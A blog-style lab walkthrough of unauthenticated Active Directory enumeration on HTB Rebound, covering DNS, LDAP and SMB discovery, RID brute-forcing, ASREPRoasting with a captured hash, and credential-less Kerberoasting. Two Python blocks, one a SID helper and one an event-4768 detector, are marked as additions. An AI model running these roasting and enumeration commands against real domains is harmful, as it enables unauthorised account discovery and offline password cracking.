Unauthenticated Path - with HTB rebound

graph TD
    A[Kerberos] --> B[Preauth Not required]
    B --> B1[Impacket-GetNPUsers]
    B --> B2[Impacket-UserSPNs -no-preauth]
    A --> C[SMB] --> C1[netexec]
    A --> D[LDAP] --> D1[Ldapsearch]
    A --> E[DNS] --> E1[dig]
    E --> E2[nslookup]
    A --> F[Kerberos]

Recently, I had the chance to face an Active Directory environment without any credentials. I’m not going to lie—this was a humbling experience.

Yes, there are plenty of tools, methodologies, and attack vectors out there. But if all I have is an IP address, what can I actually do? This post is a deep dive into that question, mainly for my own benefit.

This particular machine had the following ports open:

I believe SMB was also open, along with some other ports, though I don’t recall the exact ones.

One key observation was the presence of Port 53 - DNS and Port 88 - Kerberos. DNS and Kerberos? This has to be a sign, right? It’s likely this machine is a Domain Controller (DC). My first step (besides running nmap—which is basically step 0) was to start enumerating the DNS port.

Since I can’t share customer data, I'll demonstrate using HTB Rebound to pull some information.

1. Port 53 - DNS

1.1 dig

Let’s begin with port 53. According to its man page:

dig is a flexible tool for interrogating DNS name servers. It performs DNS lookups and displays the answers returned by the queried name servers. Most DNS administrators use dig to troubleshoot DNS issues due to its flexibility, ease of use, and clarity of output.

For example, using dig on google.com yields the following information:

As mentioned, a strong indicator of a Domain Controller is the presence of open ports like 53, 88, 389, 636, 3268, and 3269. Generally, a Key Distribution Center (KDC) is a Domain Controller. This insight simplifies our dig command.

Here’s what worked: after updating /etc/hosts with rebound.htb, I ran:

$ dig any rebound.htb @rebound.htb

The output confirmed DC01’s information with its IP address.

; <<>> DiG 9.19.19-1-Debian <<>> any rebound.htb @rebound.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46727
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
...

However, attempting a reverse DNS lookup didn’t yield fruitful results, likely due to my connection to a local DNS server on a VPN.

Common DNS Query Types
DNS supports various query types (A, AAAA, MX, NS, TXT, SRV, etc.). The easiest approach is to use ANY, which retrieves all records, though ANY can sometimes be blocked for security reasons.

1.1.1 Solutions for Local DNS

We can refine dig with specific subdomains:

dig A @10.10.11.231 dc01.rebound.htb

Or, querying the LDAP SRV record that lists the domain controllers:

dig _ldap._tcp.dc._msdcs.rebound.htb SRV @rebound.htb

Alternatively, we can use nslookup:

nslookup -type=SRV _kerberos._tcp.rebound.htb 10.10.11.231

1.2 nslookup

nslookup is another valuable tool for identifying live hosts and finding Domain Controller names.

1.3 Dnsrecon

Dnsrecon provides insight into which hosts are available.

└─$ dnsrecon -r 127.0.0.0/24 -n rebound.htb

2. Port 88 - Kerberos

Kerberos is an identity management solution for Windows authentication, also compatible with Linux. It allows users to access an organization's resources without entering a password each time—hence, it’s a Single Sign-On (SSO) solution. In a Kerberos setup, the Key Distribution Center (KDC), typically a Domain Controller, holds the keys to the Kerberos system.

In Active Directory (AD) testing, having a credential—especially a username—is crucial. In black-box engagements, OSINT through sources like LinkedIn might help identify usernames. For Kerberos-specific enumeration, kerbrute and Impacket are my preferred tools.

3. Ports 389, 636, 3268, 3269 - LDAP

To me, LDAP functions like an old phone book, allowing us to search for services. However, pulling useful data usually requires some credentials.

┌──(kali㉿kali)-[~/HTB/rebound]                                   
└─$ ldapsearch -x -H ldap://rebound.htb -x -s base                              
...snip...
rootDomainNamingContext: DC=rebound,DC=htb
...

4. Ports 139, 445 - SMB

netexec, the successor to crackmapexec, is another great tool for enumerating SMB and LDAP. It’s helpful for assessing shares and identifying permissions.

$ sudo netexec smb rebound.htb

Interestingly, there’s a distinction between a Null session (no username) and a Guest session (random username). With netexec, I observed READ permissions on IPC$ and the Shared share.

$ sudo netexec smb 10.10.11.231 -u 'a' -p '' --shares # Guest

$ sudo netexec smb 10.10.11.231 -u '' -p '' --shares # NULL

We can achieve a lot with netexec in SMB enumeration. Here's a breakdown of the commands you might run against the target (IP 10.10.11.231 in this case) to gather as much information as possible:

$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --disks 
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --shares
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --interfaces
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --loggedon-users
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --users
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --rid-brute
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --groups
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --local-group
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --pass-pol
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' -M enum_av

Each of these options has a specific purpose:

Retrieving and Downloading Shares

Once you know some shares exist, you can use spider_plus to crawl these shares and download data:

$ sudo netexec smb 10.10.11.231 -u 'b' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True

Explanation:

The output will show share information and downloadable data if accessible, with detailed metadata saved locally.

4.1 What is RID?

RID stands for Relative Identifier. Each user and group in a domain has a unique RID that, when combined with the domain's SID (Security Identifier), creates a unique identifier for each account within the domain. When you obtain RIDs, you can map these identifiers back to usernames if you know the domain SID.

For example, you can use impacket-lookupsid to gather usernames by combining RIDs with the domain SID:

impacket-lookupsid -no-pass "tester@rebound.htb" <maxRid>

This command will reveal the Domain SID and map RIDs to actual account names, which can give you a list of all users in the domain.
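To make the SID/RID relationship above concrete, here is added example code (not from the post and not part of Impacket) that builds an account SID from a domain SID and a RID, splits it back apart, converts between the string form and the binary form LDAP returns in objectSid, and names well-known RIDs; the domain SID and the resolved-name dictionary are constructed values.

```python
import struct

# Well-known RIDs that every domain shares; RIDs below 1000 always map to
# built-in principals, so these names can be resolved without asking the DC.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins"}

def parse_sid(sid):
    """Split 'S-1-5-21-...' into (revision, identifier authority, [sub-authorities])."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID string: %r" % sid)
    return int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]

def account_sid(domain_sid, rid):
    """An account SID is the domain SID with the RID appended as the last sub-authority."""
    rev, auth, subs = parse_sid(domain_sid)
    return "S-%d-%d-%s" % (rev, auth, "-".join(str(s) for s in subs + [rid]))

def split_account_sid(sid):
    """Inverse of account_sid: peel the last sub-authority off as the RID."""
    rev, auth, subs = parse_sid(sid)
    if len(subs) < 5 or subs[0] != 21:
        raise ValueError("not a domain account SID (expected S-1-5-21-x-y-z-RID)")
    domain = "S-%d-%d-%s" % (rev, auth, "-".join(str(s) for s in subs[:-1]))
    return domain, subs[-1]

def sid_to_bytes(sid):
    """Binary layout used by LDAP objectSid: revision byte, sub-authority count byte,
    6-byte big-endian identifier authority, then little-endian 32-bit sub-authorities."""
    rev, auth, subs = parse_sid(sid)
    return (struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def bytes_to_sid(data):
    """Decode the binary objectSid layout back into the S-1-5-... string."""
    rev, count = data[0], data[1]
    auth = int.from_bytes(data[2:8], "big")
    subs = struct.unpack("<%dI" % count, data[8:8 + 4 * count])
    return "S-%d-%d-%s" % (rev, auth, "-".join(str(s) for s in subs))

def rid_to_name(rid, resolved=None):
    """Name a RID: well-known RIDs first, then names a tool like lookupsid resolved
    (the 'resolved' mapping is a constructed placeholder for that output)."""
    return WELL_KNOWN_RIDS.get(rid) or (resolved or {}).get(rid, "RID %d (unresolved)" % rid)

if __name__ == "__main__":
    domain = "S-1-5-21-111111111-222222222-333333333"  # constructed domain SID
    print(account_sid(domain, 512), rid_to_name(512))
    print(bytes_to_sid(sid_to_bytes(account_sid(domain, 1106))))
```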

4.2 Impacket-GetNPUsers

If you discover an account with Kerberos pre-authentication disabled (an ASREPRoastable account), you can use it to request an authentication reply without knowing the user's password. This can be useful in password-cracking attempts later on.
==A big catch here: you will absolutely need a / at the end of your target. Impacket parses the target as domain/[username[:password]], so rebound.htb/ selects the domain with an empty username, and the candidate names then come from -usersfile.==

$ impacket-GetNPUsers -request -dc-ip 10.10.11.231 -dc-host rebound.htb -usersfile ./users1.txt -no-pass rebound.htb/
...snip...
$krb5asrep$23$jjones@REBOUND.HTB:ab30b6f20830a94aefba1d551572060e$4a3bb3d56c2422a68d55dda560b3f89ba61fcd0c8acb977347288530876fa80689f447c0ef7308358c681ab906f04466c69bdc38b07e38d5f6795ce665be2171bd2d81787bd2cf7c5d7fca87d3ca39db5bb770715d28fe6468abc6b6427003b7c9c850e744d3632468aabcc0ca57c730d477df1b7d1542f8db5036abb21addbc92b3d5f0da9dfb9c6db232dc5e47451fff2ed40ec6c580689c765c6c9c0435cd6da78eed12a69b9392bf6ba52f2e0addd0cde9cec13b8df9b86aa26728ae471be276682b9323ddaf406e5f325838eb8a71ad773b80a302f32d1c031ef9c02a2119ee9c8f4799239385c8
...snip...

Explanation:

When successful, it retrieves a hash for users like jjones, which you can then attempt to crack offline.

==ASREPRoast hashes are not NTLM hashes, so they cannot be used in Pass-the-Hash attacks.== This limitation exists because:

ASREPRoast hashes are the encrypted part of the AS-REP (the reply that carries the TGT), which the KDC encrypts with the user's long-term key; for RC4 (etype 23) that key is the user's NT hash.
They do not contain the actual NTLM hash or password; they are simply Kerberos data encrypted with a key derived from it.
To use these hashes meaningfully, you need to crack them offline to reveal the user's password. Once you have the plaintext password, you can use it for direct Kerberos authentication or derive the NT hash for other purposes.

ASREPRoasting lets us capture a Kerberos AS-REP encrypted with the user's NT hash, but we'll need to crack it to extract the password.

4.3 Impacket-GetUserSPNs

GetUserSPNs queries the target domain for Service Principal Names (SPNs) that are associated with user accounts. This is useful for Kerberoasting attacks, where we aim to extract service account hashes.

What is SPN?

While I had a hard time cracking the ASREPRoast hash, I ran into 0xdf's write-up and found Charlie Clark's research describing a new path. BLUF from 0xdf's write-up:

Therefore, if any account is configured to not require pre-authentication, it is possible to Kerberoast without any credentials. This method of Kerberoasting has been implemented in Rubeus within this PR.

impacket-GetUserSPNs -request -dc-ip 10.10.11.231 -dc-host rebound.htb -usersfile ./users1.txt -no-pass rebound.htb/ -no-preauth jjones
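As the defender's counterpart to sections 4.2 and 4.3, here is added example code (not from the post, 0xdf, or Impacket) that runs over constructed Windows Security event 4768 (TGT requested) records and flags the footprints of both techniques: AS-REQs accepted without pre-authentication, AS-REQs whose service is something other than krbtgt, and bursts of unknown-principal failures from a username sweep. It assumes the standard 4768 field names (TargetUserName, ServiceName, PreAuthType, TicketEncryptionType, IpAddress, Status) flattened to key=value lines.

```python
import re
from collections import Counter

# Constructed sample of event 4768 records flattened to key=value lines for the demo;
# these are not logs from the page or from HTB Rebound.
SAMPLE_4768 = [
    "TargetUserName=alice ServiceName=krbtgt PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.50 Status=0x0",
    "TargetUserName=jjones ServiceName=krbtgt PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.99 Status=0x0",
    "TargetUserName=jjones ServiceName=svc_sql PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.99 Status=0x0",
    "TargetUserName=bob ServiceName=krbtgt PreAuthType=2 TicketEncryptionType=0x17 IpAddress=10.0.0.51 Status=0x0",
    "TargetUserName=nosuch ServiceName=krbtgt PreAuthType=0 TicketEncryptionType=0x0 IpAddress=10.0.0.99 Status=0x6",
]

FIELD = re.compile(r"(\w+)=(\S+)")

def parse_4768(line):
    """Split one flattened 4768 record into a dict of its fields."""
    return dict(FIELD.findall(line))

def classify(event):
    """Return findings for one successful 4768 event (empty when it looks normal).
    PreAuthType 0 means the KDC issued the AS-REP without pre-authentication, which is
    what GetNPUsers relies on; etype 0x17 (RC4) makes that reply cheap to crack offline."""
    findings = []
    if event.get("Status") != "0x0":
        return findings  # failures are counted separately by unknown_principals_by_ip
    if event.get("PreAuthType") == "0":
        rc4 = event.get("TicketEncryptionType") == "0x17"
        findings.append(("asrep-no-preauth", event["TargetUserName"], rc4))
        # A service other than krbtgt in an AS-REQ is a service ticket obtained with
        # no TGT and no credentials: the -no-preauth Kerberoast path from section 4.3.
        if event.get("ServiceName", "krbtgt").lower() != "krbtgt":
            findings.append(("kerberoast-via-asreq", event["ServiceName"], rc4))
    return findings

def detect(lines):
    """Run classify over every record and collect the findings in log order."""
    findings = []
    for line in lines:
        findings.extend(classify(parse_4768(line)))
    return findings

def unknown_principals_by_ip(lines):
    """Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) per source IP: many of these from one
    address is the footprint of a -usersfile sweep over names that do not exist."""
    return Counter(e["IpAddress"] for e in map(parse_4768, lines) if e.get("Status") == "0x6")

if __name__ == "__main__":
    for finding in detect(SAMPLE_4768):
        print(finding)
    print(unknown_principals_by_ip(SAMPLE_4768))
```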